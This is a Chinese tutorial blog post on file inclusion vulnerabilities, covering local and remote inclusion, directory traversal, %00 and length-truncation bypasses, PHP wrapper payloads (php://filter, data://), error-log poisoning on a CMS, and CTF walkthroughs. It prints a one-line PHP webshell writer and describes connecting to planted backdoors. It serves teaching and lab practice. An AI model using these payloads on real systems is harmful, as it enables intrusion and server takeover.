文件操作之文件包含全解（31）

2023-10-28

文件包含的作用就是将这个文件包含进去之后，会调用指定文件的代码。先将文件包含才能执行里面的一些相关代码，比如所想进行文件的链接，数据库的查询，就可以先包含一个数据库的配置文件，再去链接的话就享有配置文件的一些配置信息，就不需要在进行相关的操作。

它可以把一些功能性代码写到一个文件里面，然后用另外一个文件去包含这个文件，这样子就不再重复书写那个包含文件里面的代码。

举四个脚本语句，asp，php，jsp，aspx等

<!==#include file=”1.asp”--> 就相当于包含了1.asp

<!==#include file=”top.aspx”--> 这个aspx运行，包含了一个top.aspx文件

<c:import url=”http://thief.one/1.jsp”> 包含一个远程地址文件jsp

<% include file=”head.jsp”%> 第二种写法，包含一个本地地址文件 jsp

<jsp:include page=”head.jsp”/> 第三种jsp写法

<?php include(‘test.php’)?> php的写法

包含文件的常见写法

搭建一个靶场演示

声明一个变量filenam=get接收到filename值。然后include包含变量filename，

在网站当前目录是有一个1.txt文件的

现在通过地址去访问一下include.php这个文件，

然而phpinfo并没有在代码中体现，而是写在1.txt里面的，然而直接访问1.txt

就只会显示里面的内容，并不会当作代码去执行。而在包含文件里面不管你是asp还是txt，都会把里面的内容当作php代码去执行。网站是php就以php代码去执行，asp就以asp代码去执行。

条件就是一个可控变量，一个漏洞函数，（include包含函数）

#检测

第一种是白盒，有代码之后我们去代码里面分析（代码审计）

第二种是黑盒，没有漏洞，就利用工具去扫描，去看公开的漏洞有没有，利用这个功能点和参数值去判定，就是看后面的参数值的值街上的是不是一个文件或者类似文件名字的命名，来判定给的参数值是不是一个文件，功能点就是去思考这个网站的功能是干嘛用的通过这个功能去思考会涉及到那些函数，有没有文件包含。

这个是检测的一个大概思路。

#类型

类型分为两种一种是本地包含，就是包含本地的文件。一种是远程包含，就是能包含互联网所能访问的文件，都能包含。

远程包含危害更大，因为可以自己去写一个文件，去做一个网站，让包含漏洞的文件指向它，然而这个东西是可以自定义，所以就可以写后门代码之类的东西。

包含都会涉及到应该叫无限制一个叫有限制，无限制就是这个包含漏洞没有限制就直接用，有限制就可能有一些一些干扰，需要我们用特定的方法去绕过。

#利用

我们在利用漏洞的时候都有各种各样的要求，我们能不能进行读取里面的文件或者执行相关的命令，这时我们可以进行一些伪造协议，这些伪造协议也可以进行上面有限制的绕过，利用伪造协议去绕过一些常见的waf软件也是可以的。利用就属于拓展应用，其他协议的结合。

#说一下本地包含，远程包含

本地包含要跨目录，比如想去包含d盘下面的一个文件

就要往上跨两级，../是上一级的意思，所以我们要写两个，最终网站就是

127.0.0.1/xx.php?filename=../../qingshu.txt

成功包含到了w.txt文件，并且执行了里面的语句

现在来看一下有限制的源码

这个有限制是他指向的文件后缀为.html，再去指向刚刚指向过的1.txt文件

这时候就发现网站不一样了，现在他包含的文件的就相当于包含的1.txt.html，由于当前目录没有这个文件，所以执行失败，因为他在文件后面强制加了一个.html，这种就是常规额的验证方式，可以用以下两种方式去绕过，

%00截断，不过要是php环境，而且php版本<5.3.4，小于5.3.4版本呢

这种不太推荐但是很方便，只需要在后面加上个%00，刚刚作者是版本大于5.3.4访问还是刚刚效果切换到了小于5.3.4的版本就正常访问了。

第二种方法，长度截断

条件：Windows系统的话点号需要长度大于256位，linux系统的话点号长度需要大于4096位，大于这个长度就直接截断了，垃圾数据填充的方法思路差不多。

操作系统是目标服务器操作系统

就这样填充垃圾数据。

#远程包含

其实在任何脚本里面都有这么一个简单的设置，来确定这个漏洞会不会成为远程包含。

第一个是代码里面有限制只能包含本地文件就不会远程包含，如果说代码里面没有，并且开发平台上面设置也没有设置禁止包含远程文件，就可能产生远程包含漏洞。

在php里面就有一个开关，allow_url_include

这个是可以通过查看phpinfo查到的和开关状态

如果这里是开启状态的话就允许远程地址的请求，就支持远程包含文件，这里把源码恢复到没有拦截的时候，然后这里老师自己博客里面有一个有远程代码的文件，

远程包含一下老师的文件的时候，输出来了，还显示出来了phpinfo的效果。

而包含的地址是一个远程地址，把这个远程文件去访问了，并且调用执行了。

如果这个远程文件是一个后门代码，现在把那个文件写为一个远程代码，

然后再去访问一下网站，现在代码已经不显示了，但代码已经执行了

我们现在就可以用菜刀去连接这个后门

直接连接上

然后现在把源代码换回来那个有过滤的，然后在去访问网址就不行了，这个过滤也很简单

末尾加？加%23 加%20 都可以执行

#各种协议流玩法

比赛题目考到的话基本上都会碰到这个伪造协议

我们伪造的时候要先知道这个脚本代码支不支持这个协议，curl不是

协议是分支持不支持的对好的就是支持的协议，和版本限制，在那个脚本代码下可以伪造那个协议。

这个是php里面的写法，测试的版本，部分功能的改观情况，off/on的就是开不开都可以，

选用那种伪造协议要先确定当前网站的脚本代码是否支持，可能还有些支持下面还需要条件

php伪协议链接：https://www.cnblogs.com/endust/p/11804767.html （很全）

讲几个比较重点的

http://127.0.0.1:8080/include.php?filename=php://filter/convert.base64-encode/resource=1.txt

通过这个代码就可以读取文件里面的内容（链接里面参考）

base64加密是为了避免有一些文件内容乱码，拿去解密就好了。

换一个执行代码效果，就去链接里面找就好了，那里也有说要换成post提交方式，

写入一句话后门代码

<?php fputs(fopen('shell.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>

这个语句就相当与写一个shell.php文件，然后将后门的一句写入到那个文件里面去，写入之后就可以直接连接这个shell.php代码试试，

file协议在上面那个表里面是都支持的，

还要data协议，图片上没有。好像php特，

http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>

里面的内容执行代码可以由你自定义，比如这里我想输出个地东西

这就是我们说的具体协议的玩法，如果是别的脚本代码直接去网上搜脚本代码的为协议就好。

ctf-南邮大，i春秋百度坏真题-白盒

打开题目网址

这种题目都是光秃秃的，源码也就只有几串，我们该如何去判断它是什么漏洞w

我们观察页面显示啥都没有，就去看看网址然后就看到后面跟着？file=show.php，file是文件的意思，后面就等于了一个文件，然后我们去掉？file=show.php，之后在访问网站，又是另一个界面

所以我们直接访问show.php文件试试

也是显示这个结果，这就很明显访问这个文件执行的是结果，而刚刚那个文件加了一个参数值包含了一个文件，然后在执行show.php，所以这是一个文件包含漏洞，然后我们他是读取还是执行，我们该如何去利用他，先确定一下他的操作系统

区分大小写是linux，那就可以确定使用的命令，这个网站是php网站，然后输入php为协议代码，之后post方式提交漏洞语句

这个可能是被检测到了，或者监控了，因为他是个非常敏感的命令执行函数，我们要先测试一下，

还是不行，看下面这个表格

刚刚使用的是这个语句，可能是因为他没有打开需要的配置，我们换一个语句就好了，打开php的为协议链接，复制一个读取文件的代码下来，拿到网站上来直接用。

这时一个base64编码，我们拿去解码一下，

解码测试出来，然后放到一个文档上看看

春秋-CTF训练演示

打开网站靶场

这个代码的意思如果是request方式接受所有格式提交，有参数值变量path就包含path，如果不是就包含phpinfo.php，这时候我们就使者给path赋值然后就是php为协议命令执行代码，执行ls（语句用大小写测试过什么操作系统），显示出来了

然后很明显我们要读取哪一个文件，直接去读取，网页显示什么都没有就差看一下源代码

结果出来了

某cms程序文件包含利用-黑盒

文件包含分为两种，一种是本地包含，只能包含本地的问，这个需要上传一个文件上去区包含，如果没有，我又不知道他的本地文件叫什么，没办法去包含，如果没有第一种思路就是看能不能上传一个文件上去，其次是看有没有别的方法解决

打开靶场

我们知道他是eku就直接去网上搜eku漏洞

然后打开一个网站

就是在执行这个他的错误日志里面写入一个一句话后么代码，然后去包含错误文件日志地区，

这就是提示了一个错误，但是在他的错误日志里面

就已经上传了这个文件，

然后去访问就执行了这个文件，密码是orange，

不用菜刀链接，这样测试一下没问题就没事。

这里可能会想为什么不能直接用菜刀去链接那个上传的文件，因为上传的文件类型不是php文件，里面有php代码也解析不了，执行不了。

修复

waf安全产品，固定后缀文件，如果不需要传参数值，就直接写死最好，不给变量，

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系:hwhale#tublm.com(使用前将#替换为@)

文件操作之文件包含全解（31）的相关文章

MongoTemplate upsert - 从 pojo 进行更新的简单方法（哪个用户已编辑）？

这是一个简单的 pojo public class Description private String code private String name private String norwegian private String en
手动编辑 Jar 以更改包名称

我有一个来自外部源的 jar 文件 jar 中的所有类都位于 com xyz 包中我想将所有类移动到 com xyzold 包中这是否像解压缩 jar 将 xzy 文件夹重命名为 xyzold 并重新压缩它一样简单或者我还需要修改每个
jvm 次要版本与编译器次要版本

当运行使用具有相同主要版本但次要版本高于 JVM 的 JDK 编译的类时 JVM 会抛出异常吗 JDK 版本并不重要类文件格式版本 http blogs oracle com darcy entry source target class
Spring3/Hibernate3/TestNG：有些测试给出 LazyInitializationException，有些则没有

前言我在单元测试中遇到了 LazyInitializationException 的问题而且我很难理解它正如你从我的问题中看到的那样Spring 中的数据库会话 https stackoverflow com questions 13
RMI 中的引用传递问题？ [复制]

这个问题在这里已经有答案了有人可以告诉我我错在哪里为什么这个 RMI 聊天应用程序不起作用目标是通过远程对象或序列化对象实现客户端服务器和逻辑之间的解耦 import javax swing import java awt even
尝试使用 JRI 将 R 与我的 Java 应用程序集成，但出现错误。谁能解释一下原因和解决办法吗？

我需要将 Java 与 R 集成来运行一些数学命令并使用 R 的功能进行绘图以下部分代码给出了错误 public static void main String args HelloRWorld r new HelloRWorld r h
字符串池可以包含两个具有相同值的字符串吗？ [复制]

这个问题在这里已经有答案了字符串池可以包含两个具有相同值的字符串吗 String str abc String str1 new String abc Will the second statement with new operator
Java Microsoft Excel API [关闭]

就目前情况而言这个问题不太适合我们的问答形式我们希望答案得到事实参考资料或专业知识的支持但这个问题可能会引发辩论争论民意调查或扩展讨论如果您觉得这个问题可以改进并可能重新开放访问帮助中心 help reopen questi
JTable 和 JScrollpane 大小的问题

我有一个JScrollPane with a JTable在里面在里面JTable我最初有 3 行稍后添加行默认JTable我的 3 行很难看因为JScrollPane calls getPreferredScrollableVie
JFace ColumnWeigthData 导致父级增长

我有一个 Eclipse RCP 应用程序并且想要在TableViewer using ColumnWeigthData as ColumnLayoutData 问题是父表单 ScrolledForm在示例代码中每当我布局表格时都会增加
Java-如何将黑白图像加载到二进制中？

我在 FSE 模式下使用 Java 和 swing 我想将完全黑白图像加载为二进制格式最好是二维数组并将其用于基于掩码的每像素碰撞检测我什至不知道从哪里开始过去一个小时我一直在研究但没有找到任何相关的东西只需将其读入Buffer
带有 OpenId 提供程序的 Java Spring 安全性

我有一个 spring MVC 应用程序另一个客户端应用程序想要使用 open id connect 访问我的 spring 应用程序如何在服务器端实现开放ID提供商请帮忙 MITREid 连接 OpenID Connect Java
如何找到被点击的JLabel并从中显示ImageIcon？

这是我的代码我想知道哪个l单击然后在新框架中显示该 ImageIcon e getSource 不起作用 final JFrame shirts new JFrame T shirts JPanel panel new JPanel n
JavaFX - 为什么多次将节点添加到窗格或不同的窗格会导致错误？

我现在正在学习基本的 JavaFX 我不明白我正在阅读的书中的这一说法不诸如文本字段之类的节点只能添加到一个窗格中一次将节点添加到多次窗格或不同的窗格将导致运行时错误我可以从书中提供的UML图看出它是一个组合但我不明白为什么库类
Java中的回调接口是什么？

SetObserver 接口的代码片段取自有效的Java 避免过度同步第67条 public interface SetObserver
公共方法与公共 API

在干净的代码书中有一个观点是公共 API 中的 Javadocs 同样 Effective java 一书也有这样的内容项目 56 为所有公开的 API 元素编写文档注释所以这就是我的问题所有公共方法都被视为公共 API 吗它们
如何用表达式语言获取布尔属性？

如果我有一堂这样的课 class Person private int age public int getAge return age public boolean isAdult return age gt 19 我可以得到age像这样
无法使用 wget 在 CentOS 机器上安装 oracle jdk

我想在CentOS上安装oracle java jdk 8 我无法安装 java jdk 因为当我尝试使用命令安装 java jdk 时 root ADARSH PROD1 wget no cookies no check certific
为什么应该首选 Java 类的接口？

PMD https pmd github io 将举报以下违规行为 ArrayList list new ArrayList 违规行为是避免使用 ArrayList 等实现类型而是使用接口以下行将纠正违规行为 List list ne
如何在不同版本的Google App Engine中使用自定义域名？

我使用谷歌应用程序引擎作为我的 Android 和 Web 应用程序的服务器我使用 Android Studio 开发了 Android 应用程序并使用 Eclipse 开发了 Web 应用程序我在应用程序引擎中部署了两个版本第一个

随机推荐

部署ELFK

目录 ELFK ES logstash filebeat kibana 环境准备所有节点 Elasticsearch 集群部署在Node1 Node2节点上操作修改elasticsearch主配置文件 es 性能调优参数启动elas
Marriage is Stable

http acm hdu edu cn showproblem php pid 1522 Problem Description Albert Brad Chuck are happy bachelors who are in love w
JVM--三大子系统详解

首先需要了解java的命令 javac 将java文件编译为 class文件里面是一些二进制文件 javap c 将 class文件变为反汇编例如 javap c hello class gt demo txt 可以将class文件转化
GPIO介绍

目录一 GPIO是什么二 STM32引脚分类三 GPIO内部结构四 GPIO的工作模式 4 1 输入模式模拟上拉下拉浮空 4 2 输出模式推挽开漏 4 3 复用功能推挽开漏 4 4 模拟输入输出上下拉无影响一 G
c语言将csv文件存储到数组,读取CSV文件并将值存储到数组中

青春有我我最喜欢的CSV解析器是一个内置在 NET库中的解析器这是Microsoft VisualBasic命名空间中隐藏的宝藏下面是一个示例代码 using Microsoft VisualBasic FileIO var path
ConcurrentHashMap 的实现原理

目录常见问题 1 concurrentHashMap特点 2 concurrentHashMap如何保证效率高又安全的 1 构造函数 2 put方法 2 1 initTable 2 2 addCount方法 3 get方法常见问题 1
【SpinalHDL】Windows10系统搭建SpinalHDL 开发环境

本文主要记载如何从零开始在win平台搭建SpinalHDL开发环境并跑通第一个spinal project demo 1 环境准备 1 1 软件下载首先列出需要安装的软件并逐一对这些软件的功能和其必要性进行说明需要安装的软件 IDEA
继电器的过流过压保护（自恢复保险丝）

简述继电器广泛应用于消费电子产业和工业设备中它具有控制系统又称输入回路和被控制系统又称输出回路它实际上是用较小的电流去控制较大电流的一种自动开关故在电路中起着自动调节安全保护转换电路等作用继电器可能因为过流或者过压而损
arduino/mixly TFT显示SD卡的图片

一器材 SD卡模块 1 8寸TFT屏 ST7735 arduino uno开发板 SD卡二接线 TFT屏 arduino uno GND GND VCC 5V SCL D13 SDA D11 RES D8 DC D10 CS D9 B
Java锁机制

Java锁主要是为了解决线程安全问题当多个线程共享同一个变量时可能会出现同时修改变量的情况这样会导致最终计算结果错误未解决该问题 Java提供了各种锁来确保数据能够被正常修改和访问最常用的比如synchronized 一互斥同步
python计算机视觉学习第三章——图像到图像的映射

目录引言一单应性变换 1 1 直接线性变换算法 1 2 仿射变换二图像扭曲 2 1 图像中的图像 2 2 分段仿射扭曲 2 2 图像配准三创建全景图 3 1 RANSAC 随机一致性采样 3 2 拼接图像四总结引言本章
[4G&5G专题-119]：5G培训应用篇-4-5G典型行业应用的解决方案(车联网、智慧医疗、智能教育、智能电网）

目录前言前言 1 总目录前言 2 本章第1章 5G行业应用介绍第2章车联网解决方案 2 1 车联网概述 2 2 车联网需求分析 2 3 车联网解决方案第3章智慧医疗解决方案第4章智能教育解决方案第5章智能电网解决方案
Mybatis配置多数据源

前言 Spring Boot项目使用Mybatis 既要从上游系统同步数据又要操作本系统的数据库所以需要引入双数据源配置Mybatis 步骤一配置双数据源连接数据库 1 禁用Spring Boot数据源的自动装配在启动类 Sp
请求调页存储管理方式的模拟含详细代码和实验结果截图

请求调页存储管理方式的模拟实验目的通过对页面页表地址转换和页面置换过程的模拟加深对请求调页系统的原理和实现过程的理解实验内容假设每个页面中可存放10条指令分配给一作业的内存块数为4 用C语言模拟一作业的执行过程该作业共有3
为什么Hadoop集群中机器台数多反而执行速度慢？

这里我对这个现象给出解释由于水平有限发现错误请及时留言或站内和我联系这里假设集群中有slave1 slave2 slave3三个节点其中slave3工作效率低一共有6个任务需要去做 slave1和slave2执行一个任务是1
104个精选计算机毕业设计项目，助你制作出色的程序，一定要试试

对于即将面临毕业设计的计算机专业的同学们如何选题和完成毕设项目成为一个重要而又棘手的问题今天给大四的同学分享毕业设计项目希望对正在为毕业设计发愁的小伙伴有帮助一成品列表以下所有springboot框架项目的源码博主已经打包好上传
rpmbuild制作包的详细过程

https www cnblogs com schangech p 5641108 html https www ibm com developerworks cn linux l rpm 一目录结构生成 1 工具安装rpmdevtool
STM32之中断和事件

中断和事件什么是中断当CPU正在执行程序时由于发生了某种事件要求CPU暂时中断当前的程序执行转而去处理这个随机事件处理完以后再回到原来被中断的地方继续原来的程序执行这样的过程称为中断什么是事件当检测到某一个动作的触发
内网 centos7 离线安装rpm包的三种方法

一使用 downloadonly参数此种方法的优点是下载的rpm包可以下载至同一目录中一互联网电脑下载rpm包 1 查看互联网电脑是否支持只下载不安装功能执行yum帮助命令 yum help 如果列表中出现 downloado
文件操作之文件包含全解（31）

文件包含的作用就是将这个文件包含进去之后会调用指定文件的代码先将文件包含才能执行里面的一些相关代码比如所想进行文件的链接数据库的查询就可以先包含一个数据库的配置文件再去链接的话就享有配置文件的一些配置信息就不需要在进行相关的操

文件操作之文件包含全解（31）

文件操作之文件包含全解（31） 的相关文章

随机推荐

热门标签

文件操作之文件包含全解（31）的相关文章